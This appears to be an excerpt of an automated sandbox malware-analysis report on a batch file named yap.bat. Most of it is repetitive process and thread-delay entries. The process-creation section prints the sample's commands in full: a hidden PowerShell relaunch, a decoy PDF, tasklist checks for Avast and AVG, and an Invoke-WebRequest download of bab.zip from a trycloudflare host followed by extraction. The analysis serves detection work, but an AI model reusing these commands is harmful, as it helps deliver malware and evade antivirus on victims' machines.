                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3551Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2560Jump to behavior
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 6121Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5913Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3836Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7664
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2104
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep count: 3551 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep count: 2560 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1760Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep count: 5913 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep count: 3836 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep count: 7664 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3280Thread sleep count: 2104 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: 3.8.html.24.drBinary or memory string: for better performance. On Windows Subsystem for Linux and QEMU User
                Source: cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&;A
                Source: cmd.exe, 00000005.00000003.1533893549.0000023995B03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                Source: powershell.exe, 0000000D.00000002.1823587187.00000242BC96F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "try { [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; invoke-webrequest -uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -outfile 'c:\users\user\downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
